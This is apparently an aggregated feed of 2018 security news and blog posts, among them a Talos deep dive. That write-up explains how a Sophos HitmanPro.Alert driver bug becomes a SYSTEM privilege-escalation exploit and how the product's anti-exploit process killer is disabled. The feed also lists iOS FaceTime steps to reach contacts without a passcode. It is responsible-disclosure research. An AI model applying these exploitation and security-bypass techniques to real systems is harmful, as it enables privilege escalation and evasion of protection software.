Unpatched Microsoft Word Video Feature Vulnerability is Being Exploited In The Wild

Last month, researchers from a cybersecurity firm shared their findings on a bug in Microsoft Word online’s video feature that

Unpatched Microsoft Word Video Feature Vulnerability is Being Exploited In The Wild on Latest Hacking News.

The value in vulnerability assessments: closing gaps to improve security

Vulnerability assessments usually involve using automated tools such as Nessus or Qualys to carry out a passive scan of an organisation’s systems. The process produces a list of security gaps and ranks them in order of risk. It gives an organisation clear data to guide the process of deciding which issues to prioritise first based on budget, available resources, or likelihood of the threat.

If forewarned is forearmed, then the value of a vulnerability assessment is that it identifies weaknesses in your systems proactively. It’s different to a penetration test which not only finds security gaps but actively exploits them to replicate the damage a malicious attacker could do without the repercussions.

Why check for vulnerabilities?

Lately, we’re seeing organisations carry out vulnerability assessments, or get an independent provider to do it for them, much more frequently. I think there are two reasons for this. One is the increasing adoption of the ISO 27001 information security standard. We advise organisations that want to get certified or stay compliant to check for vulnerabilities at least twice a year and perform a penetration test at least once a year.

The second driver is – surprise, surprise – GDPR. Growing numbers of businesses and public sector agencies are now aware that they need to protect data. Checking for weak points can help them put safeguards in place to avoid breaches. In the event of a breach, an organisation may avoid heavier penalties if it can prove to the regulator that it has been carrying out vulnerability assessments and doing their due diligence. On the other hand, the authorities won’t look too kindly on breach victims that were running old operating systems with no security controls or patching mechanisms in place.

What to fix

I carry out vulnerability assessments every week, and many of the risks I find are very common. Many of them fall into the categories of medium or high risk. For example, many websites still use old versions of SSL or TLS for encrypting data transfers. Some people might assume that a brochure website doesn’t need this level of protection, but I think that’s a mistake. Even a static page may have a function that calls another function that talks to the database or another application. This is a relatively easy issue to fix, and it addresses a potentially large security hole.

Even for a brochure website, it’s worth doing this upgrade since it’s a big gain for relatively little effort. Implementing TLS carries little cost and eliminates a lot of potential weaknesses. Since SSL was deprecated, it’s a matter of changing to TLS 1.1 or 1.2 which in some cases is as simple as checking a box.

To upgrade or not to upgrade

Another common issue that vulnerability assessments will uncover is out of date software like Apache or OpenSSH. (I recently found one site using a five-year-old version of OpenSSH!) As with the risks I referred to above, fixing them is often a matter of clicking the ‘update’ button in the application.

Whether an organisation updates or not will depend on its attitude to risk. Some choose not to do so because they are concerned about affecting their production environment. Or, they might not have time and resources to test the stability of an application on the new version. I would always argue in favour of acting, but at the very least, a vulnerability assessment will highlight areas that you can rank in order of priority.

The length of time it takes to conduct the assessment will vary. It’s not necessarily as simple a calculation as adding up the number of IP addresses to check. I’ve seen three IP addresses take four hours to scan. It also depends what software the organisation uses, and whether it’s patched or unpatched.

Taking action afterwards

Let’s say the testing lasts a day. Writing the report then involves taking the findings from the automated scanning tool and translating that into language that will allow a client to weigh up its business risk. Some companies take the report and fix the issues that it covers. Some use it as a talking point with their software development teams, to make them aware of certain vulnerabilities. Best practice advises that those organisations run an assessment a few months later to check that any fixes they implemented were successful.

However, I’ve also seen the opposite, where I have carried out monthly vulnerability checks and the client chooses not to fix the issues that the report raises. That goes to the heart of security: making decisions based on the level of risk you’re prepared to bear. Good security practice suggests looking for weak points in your security before someone with malicious intentions does it for you.

 

The post The value in vulnerability assessments: closing gaps to improve security appeared first on BH Consulting.

More Spectre/Meltdown-Like Attacks

Back in January, we learned about a class of vulnerabilities against microprocessors that leverages various performance and efficiency shortcuts for attack. I wrote that the first two attacks would be just the start:

It shouldn't be surprising that microprocessor designers have been building insecure hardware for 20 years. What's surprising is that it took 20 years to discover it. In their rush to make computers faster, they weren't thinking about security. They didn't have the expertise to find these vulnerabilities. And those who did were too busy finding normal software vulnerabilities to examine microprocessors. Security researchers are starting to look more closely at these systems, so expect to hear about more vulnerabilities along these lines.

Spectre and Meltdown are pretty catastrophic vulnerabilities, but they only affect the confidentiality of data. Now that they -- and the research into the Intel ME vulnerability -- have shown researchers where to look, more is coming -- and what they'll find will be worse than either Spectre or Meltdown. There will be vulnerabilities that will allow attackers to manipulate or delete data across processes, potentially fatal in the computers controlling our cars or implanted medical devices. These will be similarly impossible to fix, and the only strategy will be to throw our devices away and buy new ones.

We saw several variants over the year. And now researchers have discovered seven more.

Researchers say they've discovered the seven new CPU attacks while performing "a sound and extensible systematization of transient execution attacks" -- a catch-all term the research team used to describe attacks on the various internal mechanisms that a CPU uses to process data, such as the speculative execution process, the CPU's internal caches, and other internal execution stages.

The research team says they've successfully demonstrated all seven attacks with proof-of-concept code. Experiments to confirm six other Meltdown-attacks did not succeed, according to a graph published by researchers.

Microprocessor designers have spent the year rethinking the security of their architectures. My guess is that they have a lot more rethinking to do.

Chinese APT Group Exploit Fixed Critical Adobe ColdFusion Vulnerability On Unpatched Servers

In September, Adobe patched numerous critical vulnerabilities in ColdFusion. However, a couple of weeks after Adobe released the patches, researchers

Chinese APT Group Exploit Fixed Critical Adobe ColdFusion Vulnerability On Unpatched Servers on Latest Hacking News.

Canadian University Shuts Down Network in Response to Cryptocurrency Mining Attack

St. Francis Xavier University had to take its critical IT systems offline after it discovered a scheme to mine cryptocurrency using its network resources.

On Nov. 9, the school’s IT team identified an automated attack launched by unknown threat actors in an effort to steal computing power to mine cryptocurrency, otherwise known as cryptojacking.

After consulting with security specialists, the university, which is based in Nova Scotia, made the decision to disable all network systems. Representatives of the school announced plans to reinstate the offline servers across its network in stages to reduce potential security risks.

Why Did the University Shut Down Its Network?

So far, the university has reported no evidence that the personal information of students, faculty or other parties has been leaked or stolen as part of the attack. To be safe, however, administrators reset the passwords for all university accounts across campus. The IT team said it would continue to look for anomalous behavior over the next month.

The university’s swift response affected basic access to network resources such as Wi-Fi and educational software application Moodle. Meanwhile, student payment cards and debit transactions were temporarily inoperable. The school said it plans to publish a list of which services have been restored and which are still in the queue, such as its MesAmis reporting system and Banner database. The researchers did not explain exactly how the malware was installed on the system.

How to Keep Cryptocurrency Mining Threats at Bay

The St. Francis Xavier University incident is an increasingly rare example of cryptojackers focusing on bitcoin. According to security experts, general-purpose computers are not ideal for bitcoin given the sophisticated nature of its algorithm. Instead, attacks more often exploit IT resources to mine for newer cryptocurrencies such as Monero and Ethereum.

Regardless of what’s being mined, organizations that invest in security information and event management (SIEM) are better positioned to identify cryptojacking before it’s too late to remediate the threat without halting the entire network.

Sources: St. Francis Xavier, ZDNet

The post Canadian University Shuts Down Network in Response to Cryptocurrency Mining Attack appeared first on Security Intelligence.

Red Dead Redemption 2 Glitch Lets You Get Any Horse Randomly

In a game set up in the Westernized era of the late 19th century, the main charm for the players

Red Dead Redemption 2 Glitch Lets You Get Any Horse Randomly on Latest Hacking News.

Oracle and "Responsible Disclosure"

I've been writing about "responsible disclosure" for over a decade; here's an essay from 2007. Basically, it's a tacit agreement between researchers and software vendors. Researchers agree to withhold their work until software companies fix the vulnerabilities, and software vendors agree not to harass researchers and fix the vulnerabilities quickly.

When that agreement breaks down, things go bad quickly. This story is about a researcher who published an Oracle zero-day because Oracle has a history of harassing researchers and ignoring vulnerabilities.

Software vendors might not like responsible disclosure, but it's the best solution we have. Making it illegal to publish vulnerabilities without the vendor's consent means that they won't get fixed quickly -- and everyone will be less secure. It also means less security research.

This will become even more critical with software that affects the world in a direct physical manner, like cars and airplanes. Responsible disclosure makes us safer, but it only works if software vendors take the vulnerabilities seriously and fix them quickly. Without any regulations that enforce that, the threat of disclosure is the only incentive we can impose on software vendors.

Nigerian ISP Hijacks Google Traffic, Sends It Through Russia and China

A small Nigerian Internet service provider (ISP) hijacked traffic meant for Google data centers on Monday, re-routing local traffic through China and Russia and making some hosted services temporarily unavailable for users.

The post Nigerian ISP Hijacks Google Traffic, Sends It Through Russia and China appeared first on The Security Ledger.

Related Stories

Microsoft Patch Tuesday — November 2018: Vulnerability disclosures and Snort coverage

Microsoft released its monthly security update today, disclosing a variety of vulnerabilities in several of its products. The latest Patch Tuesday covers 53 vulnerabilities, 11 of which are rated "critical," 40 that are rated "important” and one “moderate” and “low” vulnerability, each.

The advisories cover bugs in the Chakra scripting engine, Microsoft Outlook and DirectX.

This update also includes three advisories. One covers vulnerabilities in Adobe Flash Player, and another covers important bugs in the Microsoft Surface tablet. Additionally, there is guidance for how users should configure BitLocker in order to properly enforce software encryption.

For more on our coverage for these vulnerabilities, check out the SNORTⓇ blog post here.

Critical vulnerabilities

Microsoft disclosed 11 critical vulnerabilities this month, which we will highlight below. There is also a critical advisory covering Adobe Flash Player.

CVE-2018-8541, CVE-2018-8542, CVE-2018-8543, CVE-2018-8551, CVE-2018-8555, CVE-2018-8556, CVE-2018-8557 and CVE-2018-8588 are all memory corruption vulnerabilities in the Chakra scripting engine. They all lie in the way that the scripting engine handles objects in memory in the Microsoft Edge internet browser. These vulnerabilities could corrupt memory in a way that an attacker could execute code in the context of the current user. An attacker needs to convince a user to open a specially crafted, malicious website on Microsoft Edge in order to exploit these bugs.

CVE-2018-8476 is a remote code execution vulnerability in the Windows Deployment Services TFTP server. The bug lies in the way the TFTP server handles objects in memory. An attacker could exploit this vulnerability by supplying the user with a specially crafted request.

CVE-2018-8553 is a remote code execution vulnerability in Microsoft Graphics Components that lies in the way Graphics Components handles objects in memory. An attacker can exploit this vulnerability by providing the user with a specially crafted file.

CVE-2018-8544 is a remote code execution vulnerability that exists in the way that the VBScript engine handles objects in memory. An attacker needs to trick a user into visiting a specially crafted website on Internet Explorer in order to exploit this vulnerability. Alternatively, the attacker could also embed an ActiveX control marked "safe for initialization" in an application or Microsoft Office document that hosts Internet Explorer’s rendering engine.

ADV180025 addresses several vulnerabilities in Adobe Flash Player, which are outlined by Adobe in a separate release. Microsoft recommends updating to the latest version of Flash Player, as well as disabling Flash on its web browsers.

Important vulnerabilities

There are also 40 important vulnerabilities in this release. We would like to specifically highlight seven of them.

CVE-2018-8256 is a remote code execution vulnerability in PowerShell when it improperly handles specially crafted files. An attacker could execute malicious code on a vulnerable system. This update fixes the vulnerability by ensuring that PowerShell properly handles files.

CVE-2018-8574 and CVE-2018-8577 are remote code execution vulnerabilities in Microsoft Excel that occurs when the software fails to properly handle objects in memory. An attacker could exploit this bug by tricking the user into opening a specially crafted Excel file, either as an email attachment or another method.

CVE-2018-8582 is a remote code execution vulnerability in Microsoft Outlook when the software fails to properly parse specially modified rule export files. Users who have their settings configured to allow fewer user rights are less impacted by this vulnerability than those who operate with administrative user rights. Workstations and terminal servers that use Microsoft Outlook are also at risk. An attacker needs to convince a user to open a specially crafted rule export file in an email in order to trigger this bug.

CVE-2018-8450 is a remote code execution vulnerability that exists when Windows Search handles objects in memory. An attacker could trigger this vulnerability by sending a specially crafted function to the Windows Search service, or via an SMB connection.

CVE-2018-8550 is an elevation of privilege in Windows COM Aggregate Marshaler. An attacker who successfully exploits the vulnerability could run arbitrary code with elevated privileges. The vulnerability does not directly allow the user to execute arbitrary code, but it could be used in conjunction with other bugs to execute code with elevated privileges.

CVE-2018-8570 is a remote code execution vulnerability in Internet Explorer that exists when the web browser improperly accesses objects in memory. An attacker could exploit this bug by hosting a malicious website on Internet Explorer and then convincing the user to visit the link.

The other important vulnerabilities are:

Moderate vulnerabilities

The one moderate vulnerability is CVE-2018-8546, a denial-of-service vulnerability in the Skype video messaging service.

Low vulnerability

There is also one low-rated vulnerability, CVE-2018-8416, which is a tampering vulnerability in the .NET Core.

Coverage

In response to these vulnerability disclosures, Talos is releasing the following SNORTⓇ rules that detect attempts to exploit them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Firepower customers should use the latest update to their ruleset by updating their SRU. Open Source Snort Subscriber Rule Set customers can stay up-to-date by downloading the latest rule pack available for purchase on Snort.org.


Snort rules: 32637, 45142, 45143, 48399 - 48404, 48374 - 48388, 48393 - 48395, 48360 - 48373, 48408 - 48410

Research Drives Protection

The threat landscape has changed often in the 22 years I’ve been working at Trend Micro and it will continue to change for many more years. We in cybersecurity are constantly at battle with hackers and threat actors who look to infect our customers using the many tactics available to them. Our job is to ensure we can detect and protect against this onslaught of attacks. In order to do that we’ve had to invest heavily in research to better understand the many components of an attack, the actors themselves, and the threats used to compromise organizations. With 500,000 commercial customers and millions of consumers all over the world we have invested in multiple threat research facilities across the globe as well as security researchers located in many other areas where we feel a physical presence is needed.

Our newest center is in Toronto, Canada where we have invested in more vulnerability research team members who are helping us improve our customers’ security. Vulnerability research is one area where Trend Micro has been investing heavily over the last several years. Besides our own internal researchers, our Zero Day Initiative (ZDI), which is the largest agnostic bug bounty program in the world, gives us unprecedented visibility into the latest 0-day vulnerabilities that could be used to exploit our customers.  ZDI today helps us publish virtual patches 72 days on average before the formal patch is published by affected vendors.

Besides vulnerability research, we have to invest in other areas of the threat landscape since our customers will be targeted across their entire network. This means ensuring we have threat experts who have a deep knowledge of these threats.  Below you will see many of the different research areas we cover.

As you can see above, we use our research to regularly improve protection for our customers. It also drives our innovation which you can see in this interactive infographic has been extensive over the past 30 years Trend Micro has been in business.

We share our research in many ways as you can also see above. Besides updates for our customers we will publish regular blogs detailing the latest threats found, reports from our researchers as well as bi-annual reports focused on the past six or 12 months of threat activity we’ve seen. Through ZDI we responsibly disclose many vulnerabilities discovered by the programs 3,500+ outside researchers who submit bugs to use regularly.

While I can’t get into all the details of where Trend Micro invests in research I can let you check out a fun interactive infographic that can help you understand better what I’ve been talking about.  What does this all mean to you? Know that Trend Micro will continue to invest in areas we need to in order to better protect our customers.

The post Research Drives Protection appeared first on .

The Pentagon Is Publishing Foreign Nation-State Malware

This is a new thing:

The Pentagon has suddenly started uploading malware samples from APTs and other nation-state sources to the website VirusTotal, which is essentially a malware zoo that's used by security pros and antivirus/malware detection engines to gain a better understanding of the threat landscape.

This feels like an example of the US's new strategy of actively harassing foreign government actors. By making their malware public, the US is forcing them to continually find and use new vulnerabilities.

EDITED TO ADD (11/13): This is another good article. And here is some background on the malware.

Bank Attacks Put Password Insecurity Back in the Spotlight

Two separate attacks on banks in the United States and Pakistan revealed this week highlight once again the inherent weakness of a security practice that relies on passwords or knowledge-based credentials to protect critical information. International bank HSBC said it was a victim of a credential-stuffing and became aware of unauthorized access...

Read the whole entry... »

Related Stories

iOS 12.1 Vulnerability

This is really just to point out that computer security is really hard:

Almost as soon as Apple released iOS 12.1 on Tuesday, a Spanish security researcher discovered a bug that exploits group Facetime calls to give anyone access to an iPhone users' contact information with no need for a passcode.

[...]

A bad actor would need physical access to the phone that they are targeting and has a few options for viewing the victim's contact information. They would need to either call the phone from another iPhone or have the phone call itself. Once the call connects they would need to:

  • Select the Facetime icon
  • Select "Add Person"
  • Select the plus icon
  • Scroll through the contacts and use 3D touch on a name to view all contact information that's stored.

Making the phone call itself without entering a passcode can be accomplished by either telling Siri the phone number or, if they don't know the number, they can say "call my phone." We tested this with both the owners' voice and a strangers voice, in both cases, Siri initiated the call.

Which Threats had the Most Impact During the First Half of 2018?

One of the best ways for organizations to shore up their data security efforts and work toward more proactive protection is by examining trends within the threat environment.

Taking a look at the strategies for attack, infiltration and infection currently being utilized by hackers can point toward the types of security issues that will continue in the future and enable enterprises to be more prepared with the right data and asset safeguarding measures.

Each year brings both continuing and emerging threats which can complicate security efforts. Awareness of the most impactful threats – including those that might have been popular in the past, as well as the new approaches spreading among cybercriminals – is crucial in the data security landscape.

Recently, Trend Micro researchers examined the data protection and cyberthreat issues prevalent during the first half of 2018 and included these findings in the 2018 Midyear Security Roundup: Unseen Threats, Imminent Losses report.

Let’s take a closer look at this research, as well as top identified threats that impacted businesses during the first six months of this year.

Widespread vulnerabilities and software patching

Back in 2014, the world was introduced to Heartbleed. At the time, it was one of the largest and most extensive software vulnerabilities, impacting platforms and websites leveraging the popular OpenSSL cryptographic software library. The bug made global news because of the vast number of websites it affected, as well as the fact that it enabled malicious actors to access, read and potentially leak data stored in systems’ memory.

Since then, a few additional vulnerabilities have been identified, including two at the beginning of 2018. Design flaws within microprocessing systems – since dubbed Meltdown and Spectre – were identified by researchers. Unfortunately, though, these weren’t the only high-profile vulnerabilities to make headlines this year.

As Trend Micro reported in May, eight other vulnerabilities were uncovered following Meltdown and Spectre, which also impacted Intel processors, including four that were considered “high” severity threats. Because these processors are used by a considerable number of devices within businesses and consumer environments across the globe, the emerging vulnerabilities were significantly worrisome for security admins and individual users alike.

Vulnerabilities that affect such large numbers of devices and users can be a significant challenge for enterprise security postures. Taking a cue from Heartbleed, the Register reported that despite the fact that a patch was released several years earlier, an estimated 200,000 systems were still vulnerable to the bug in early 2017.

Installing software updates in a timely manner is a top facet of patching best practices.

Spectre, Meltdown and the series of other identified vulnerabilities showcase the key importance of proper patching. Even Intel worked to drive this point home in a released statement encouraging users to maintain a beneficial patching strategy.

“We believe strongly in the value of coordinated disclosure and will share additional details on any potential issues as we finalize mitigations,” Intel noted, according to TechSpot. “As a best practice, we continue to encourage everyone to keep their systems up-to-date.”

The mere presence of an identified vulnerability can create security weaknesses, but an unpatched system can boost the chances of an attack or breach incident even further. It’s imperative that, in light of these widespread vulnerabilities, enterprises ensure their patching processes are comprehensive and proactive.

Cryptocurrency mining steals valuable resources

Researchers also noted that while cryptocurrency mining activity became more prevalent in 2017, this trend continued into the first half of 2018. Cryptocurrency mining programs can be more of an issue than many users might realize, as such a malicious initiative can rob enterprise infrastructures of key computing resources required to maintain top performance of their critical systems and applications, not to mention result in increased utility costs.

During the first six months of 2018, researchers recorded a more than 140 increase in cryptocurrency mining activity through Trend Micro’s Smart Protection Network Infrastructure. What’s more, 47 new miner malware families were identified during Q1 and Q2, demonstrating that cryptocurrency mining will continue to be a top initiative for hackers.

“Unwanted cryptocurrency miners on a network can slow down performance, gradually wear down hardware, and consume power – problems that are amplified in enterprise environments,” Trend Micro researchers stated in the Unseen Threats, Imminent Losses report. “IT admins have to keep an eye out for unusual network activity considering the stealthy but significant impact cryptocurrency mining can have on a system.”

Ransomware: No end in sight

For years, ransomware infections have been a formidable threat to organizations within every industry, and the first half of 2018 saw no change in this trend. Researchers again identified an increase in ransomware infection activity – 3 percent. While this may seem small, the current rate at which ransomware attacks take place make this rise significant.

At the same time, Trend Micro discovered a 26 percent decrease in new ransomware families. This means that while hackers are continuing to leverage this attack style to extort money from victims, they are utilizing existing, standby ransomware samples, creating fewer opportunities for zero-day ransomware threats.

Data breaches remain a constant issue for businesses of all shapes and sizes.

Mega breaches: An increasingly frequent issue

As the sophistication and potential severity of hacker activity continue to rise, so too do the consequences of successful attacks.

According to data from the Privacy Rights Clearinghouse, there was a 16 percent increase in data breaches reported in the U.S. during the first half of 2018, including 259 incidents overall. Fifteen of these events were considered “mega breaches,” or those that exposed 1 million records or more over the course of the breach and subsequent fallout.

Such incidents surpass traditional breaches in widespread effects on the victim company, its users and customers and the industry sector at large. Most of these mega breaches (71 percent) took place within the healthcare industry, and when one considers the significant amount of sensitive data healthcare institutions deal with, such threat environment conditions aren’t that surprising.

It’s also important to consider not only the traditional impact of regular and mega breaches – including losses related to company reputation and image, revenue, customer acquisition and retention and more – but the compliance costs that can emerge as well. This is an especially imperative consideration in the age of the EU’s General Data Protection Regulation, which became enforceable in May.

“This regulation … sets a high bar for data security and privacy protection,” Trend Micro’s report stated. “It imposes considerable fines for noncompliant organizations … Moreover, it has quite a long reach since any organization holding EU citizens’ data is affected.”

Check out Trend Micro’s GDPR Resource Center to learn more about maintaining compliance with this standard.

Read Trend Micro’s Unseen Threats, Imminent Losses report for more information about the top threats identified during the first half of this year.

The post Which Threats had the Most Impact During the First Half of 2018? appeared first on .

Talos Vulnerability Deep Dive – TALOS-2018-0636 / CVE-2018-3971 Sophos HitmanPro.Alert vulnerability

Marcin Noga of Cisco Talos discovered this vulnerability.

Introduction


Sophos patched two vulnerabilities in Sophos HitmanPro.Alert in version 3.7.9.759. We publicly disclosed these issues last week here, Cisco Talos will show you the process of developing an exploit for one of these bugs. We will take a deep dive into TALOS-2018-0636/CVE-2018-3971 to show you the exploitation process.

Sophos HitmanPro.Alert is a threat-protection solution based on heuristic algorithms that detect and block malicious activity. Some of these algorithms need kernel-level access to gather the appropriate information they need. The software's core functionality has been implemented in the `hmpalert.sys` kernel driver by Sophos. This blog will show how an attacker could leverage TALOS-2018-0636 to build a stable exploit to gain SYSTEM rights on the local machine.


Vulnerability Overview


During our research, we found two vulnerabilities in the `hmpalert.sys` driver's IO control handler. For the purposes of this post, we will focus only on TALOS-2018-0636/CVE-2018-3971, an escalation of privilege vulnerability in Sophos HitmanPro.Alert. First, we will turn it into a reliable write-what-where vulnerability and then later into a fully working exploit.

First, we use the `OSR Device Tree` tool (Figure 1) to analyse the `hmpalert.sys` driver's access rights.

Figure 1. Device Tree application showing hmpalert device privilege settings


We can see that any user logged into the system can obtain a handler to the `hmpalert` device and send an I/O request to it. Keep in mind for building this exploit, as we mentioned in the original vulnerability blog post, the I/O handler related to this vulnerability is triggered by the IOCTL code `0x2222CC.` The vulnerable code looks similar to the one below.

Figure 2. Body of a vulnerable function

The nice thing is that we fully control the first three parameters of this function, but we do not control the source data completely (e.g. the `srcAddress` needs to point to some memory area related to the lsass.exe process) (line 12).

Additionally, data read from the lsass.exe process (line 23) is copied to the destination address the `dstAddress` parameter is pointing to (line 33).

With this basic information, we can construct the first proof of concept exploit to trigger the vulnerability:

Figure 3. Minimal proof of concept to trigger the vulnerability

This looks like it could work, but it's not enough to create a fully working exploit. We need to dig into the `inLsassRegions` function and see how exactly the `srcAddress` parameter is tested. We have to check if we will be able to predict this memory content and turn our limited `arbitrary write` access into a fully working `write-what-where` vulnerability.

Controlling the source


We need to dive into the `inLsassRegions` function to get more information about the `srcAddress` parameter:

Figure 4. The function responsible for checking if the `srcAddress` variable fits in one of the defined memory regions.
We can see that there is an iteration over the `memoryRegionsList` list elements, which are represented by the `memRegion` structure. The `memRegion` structure is quite simple — it contains a field pointing to the beginning of the region and a second field that's the size of the region. The `srcAddress` value needs to fit into one of the `memoryRegionsList` elements boundaries. If this is the case, the function returns 'true' and the data is copied.

The function will return 'true' even if only the `srcAddress` value fits between the boundaries (line 21). If the `srcSize` value is larger than an available region space, the `srcSize` variable is updated with the available size line 26. The question is: What do these memory regions represent, exactly? The `initMemoryRegionList` function will give us an idea.

Figure 5. Initialization of memory regions list.
We can see that the context of a current thread is switched to the `lsass.exe` process address space and then the `createLsaRegionList` function is called:

Figure 6. Various memory elements of the lsass.exe processes are added to the memory regions list.

Now we can see that the memory regions list is filled with elements from the `lsass.exe` PEB structure. There are ImageBase addresses regarding loaded and mapped DLLs added to the list, including the SizeOfImage (line 31), along with other information. Unfortunately, the `Lsass.exe` process is running as a service. This means with normal user access rights, we won't be able to read its PEB structure, but we can leverage the knowledge about the mapped DLLs in the exploit in the following way: System DLLs like `ntdll.dll` are mapped into each process under the same address, so we can copy bytes from the `lsass.exe` process memory region from these system DLLs into the memory location pointed to by the `dstAddress` parameter. With that in mind, we can start creating our exploit.

Exploitation


This is not a typical `write-what-where` vulnerability like you see in the common exploitation training class, but nevertheless, we don't need to be too creative to exploit it. The presented exploitation process is based on the research presented by Morten Schenk during his presentation at the BlackHat USA 2017 conference. It also includes modifications from Mateusz "j00ru" Jurczyk, which he included in his paper "Exploiting a Windows 10 PagedPool off-by-one overflow (WCTF 2018)." With a few changes, we can use j00ru`s code, WCTF_2018_searchme_exploit.cpp, as a template for our exploit. These changes include:
  1. Removing entire codes related to pool feng-shui.
  2. Writing a class for memory operations using the found primitives in the hmpalert.sys driver.
  3. Updating the important exploit offsets based on the ntoskrnl.exe and the win32kbase.sys versions.
Then, we will be able to use the mentioned strategy from Morten and Mateusz:
  1. Leak addresses of certain kernel modules using the NtQuerySystemInformation API — We assume that our user operates at the `Medium IL` level.
  2. Overwrite the function pointer inside `NtGdiDdDDIGetContextSchedulingPriority` with the address of `nt!ExAllocatePoolWithTag.`
  3. Call the `NtGdiDdDDIGetContextSchedulingPriority`(`=ExAllocatePoolWithTag`) with the `NonPagedPool` parameter to allocate writable/executable memory.
  4. Write the ring-0 shellcode to the allocated memory buffer.
  5. Overwrite the function pointer inside `NtGdiDdDDIGetContextSchedulingPriority` with the address of the shellcode.
  6. Call the `NtGdiDdDDIGetContextSchedulingPriority`(`= shellcode`).
  1. The shellcode will escalate our privileges to SYSTEM access rights after copying a security TOKEN from the system process to our process.

Test environment


Tested on Windows: Build 17134.rs4_release.180410-1804 x64 Windows 10

Vulnerable product: Sophos HitmanAlert.Pro 3.7.8 build 750

Memory operation primitives


To simplify memory operations, we wrote a class using the found memory operation primitives in the hmpalert.sys driver.

Figure 7. The memory class implementation

The core `copy_mem` method is implemented like this:

Figure 8. The Memory::copy_mem method implementation


We initialize a couple of important elements inside the class constructor:

Figure 9. The memory class constructor implementation

We can use the `write_mem` method to write a certain value to a specific address:

Figure 10. The memory class write_mem method implementation
We can not directly copy bytes defined in the `data` argument. Therefore, we need to search for each byte from the `data` argument in the `ntdll.dll` mapped image and then pass the address of the byte to the hmpalert driver via the `srcAddress` parameter. That way, byte by byte, will overwrite the data at the destination address `dstAddress` with bytes defined in the `data` argument. We can easily overwrite necessary kernel pointers and copy our shellcode to the allocated page by using this class:


Figure 11. Shellcode copy operation to an allocated page.

The rest of the exploit is straightforward, so we can leave the implementation as a task for the interested reader.

Fail — Zero-day protection really works!


Armed with a fully working exploit, we are ready to test it. If it works, we should get SYSTEM level privileges.

Figure 12. The elevated console is detected and terminated by the HitmanPro.Alert.
It looks like our exploit has been detected by the `HitmanAlert.Pro's` anti-zero-day detection engine. Looking at the exploit log, it seems that its entire code was executed, but the spawned elevated console has been terminated.

Figure 13. At the end of the exploit, the console with elevated rights is executed.

We can see in the system event log that HitmanAlert.Pro logged an exploitation attempt and classified it as a local privilege escalation:


Figure 13. Event log showing that it was logged by HitmanAlert.Pro as an attempted privilege escalation.

Using a zero-day to bypass anti-zero-day detection


We know that our exploit works correctly, but the problem is that it's terminated by the anti-exploitation engine during an attempt to spawn the elevated shell.

We can look at HitmanAlert.Pro's engine to find out where this function is implemented. The Microsoft Windows API provides the `PsSetCreateProcessNotifyRoutine,` which can be used to monitor process creation in the OS. Searching for this API call in the `hmpalert.sys` driver, IDA shows a couple of calls.

Figure 14. Registration of `ProcessNotifyRoutine` via `PsSetCreateProcessNotifyRoutine` API.
We do see some places where it registers the callback routine. Let's look into the implementation of the `ProcessNotifyRoutine`. While stepping through it, we found the following code:

Figure 15. An implementation of `ProcessesKiller` function, responsible for the termination of potentially malicious processes.
At line 44, you can see a call to the routine that's responsible for killing "dangerous/malicious" processes. As we can see at line 5, there is a condition checking whether a global variable `dword_FFFFF807A4FA0FA4` is set. If it is not set, the rest of the function code will not be executed. All we need to do is to overwrite the value of this global variable with a value of zero to avoid termination of our elevated console. The final portion of the exploit looks like this:

Figure 16. Overwriting a global variable in the `hmpalert.sys` driver to trick the `ProcessesKiller` function, allowing our spawned elevated console to execute.

Time to test our exploit in action.

Final exploit - LPE Windows 10 x64 / SMEP bypass





Summary


Due to the many anti-exploitation features in today's operating systems, weaponizing vulnerabilities can often be arduous, but this particular vulnerability shows that we can still use some Windows kernel-level flaws to easily exploit bugs in modern Windows systems. This deep dive showed how an attacker could take a vulnerability and weaponize it into a stable, usable exploit. Talos will continue to discover and responsibly disclose vulnerabilities on a regular basis and provide additional deep-dive analysis when necessary. Check out or original disclosure here to find out how you can keep your system protected from this vulnerability.


Hackers attacking your memories: science fiction or future threat?

Authors: Kaspersky Lab and the Oxford University Functional Neurosurgery Group

There is an episode in the dystopian near-future series Black Mirror about an implanted chip that allows users to record and replay everything they see and hear. A recent YouGov survey found that 29% of viewers would be willing to use the technology if it existed.

If the Black Mirror scenario sounds a bit too much like science fiction, it’s worth noting that we are already well on the way to understanding how memories are created in the brain and how this process can be restored. Earlier this year proof of concept experiments showed that we can boost people’s ability to create short-term memories.

The seeds of the future are already here

The hardware and software to underpin this exists too: deep brain stimulation (DBS) is a neurosurgical procedure that involves implanting a medical device called a neurostimulator or implantable pulse generator (IPG) in the human body to send electrical impulses, through implanted electrodes, to specific targets in the brain for the treatment of movement and neuropsychiatric disorders. It is not a huge leap for these devices to become ‘memory prostheses’ since memories are also created by neurological activity in the brain.

To better understand the potential future threat landscape facing memory implants, researchers from Kaspersky Lab and the University of Oxford Functional Neurosurgery Group have undertaken a practical and theoretical threat review of existing neurostimulators and their supporting infrastructure.

The attached report is the outcome of that research. It should be noted that because much of the work involving neurostimulators is currently handled in medical research laboratories, it’s not easy to practically test the technology and associated software for vulnerabilities. However, much can be learned from handling the devices and seeing them used in situ, and this research involved both.

Among other things, the researchers found existing and potential risk scenarios, each of which could be exploited by attackers. These include:

  • Exposed connected infrastructure – the researchers found one serious vulnerability and several worrying misconfigurations in an online management platform popular with surgical teams.
  • Insecure or unencrypted data transfer between the implant, the programming software, and any associated networks could enable malicious tampering of a patient’s implant or even whole groups of implants (and patients) connected to the same infrastructure. Manipulation could result in changed settings causing pain, paralysis or the theft of private and confidential data.
  • Design constraints as patient safety takes precedence over security. For example a medical implant needs to be controlled by physicians in emergency situations, including when a patient is rushed to a hospital far from their home. This precludes use of any password that isn’t widely known among clinicians. It also means that by default such implants need to be fitted with a software ‘backdoor’.
  • Insecure behavior by medical staff – programmers with patient-critical software were being accessed with default passwords, were used to browse the internet or had additional apps downloaded onto them.

Future risk predictions

Within five years, scientists expect to be able to electronically record the brain signals that build memories and then enhance or even rewrite them before putting them back into the brain. A decade from now, the first commercial memory boosting implants could appear on the market – and, within 20 years or so, the technology could be advanced enough to allow for extensive control over memories.

The healthcare benefits of all this will be significant, and this goal is helping to fund and drive research and development. However, as with other advanced bio-connected technologies, once the technology exists it will also be vulnerable to commercialization, exploitation and abuse.

New threats resulting from this could include the mass manipulation of groups through implanted or erased memories of political events or conflicts; while ‘repurposed’ cyberthreats could target new opportunities for cyber-espionage or the theft, deletion of or ‘locking’ of memories (for example, in return for a ransom).

Conclusion

